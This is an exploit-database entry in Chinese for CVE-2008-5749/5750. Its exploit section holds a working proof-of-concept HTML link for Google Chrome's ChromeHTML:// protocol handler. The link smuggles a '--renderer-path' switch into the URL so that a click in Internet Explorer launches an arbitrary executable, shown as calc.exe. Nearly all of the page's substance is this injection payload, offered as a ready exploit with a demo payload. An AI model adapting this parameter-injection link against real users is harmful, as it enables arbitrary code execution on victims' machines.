Google Chrome Browser (ChromeHTML://) remote parameter injection POC

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052312 漏洞类型
发布时间 2008-12-31 更新时间 2008-12-31
CVE编号 CVE-2008-5749
CVE-2008-5750
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2008120204
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
<!--
Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
Site: http://retrogod.altervista.org/
tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3
List of command line switches:
http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc
Original url: http://retrogod.altervista.org/9sg_chrome.html

click the following link with IE while monitoring with procmon
-->
<a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\
calc.exe"%20--"'>click me</a>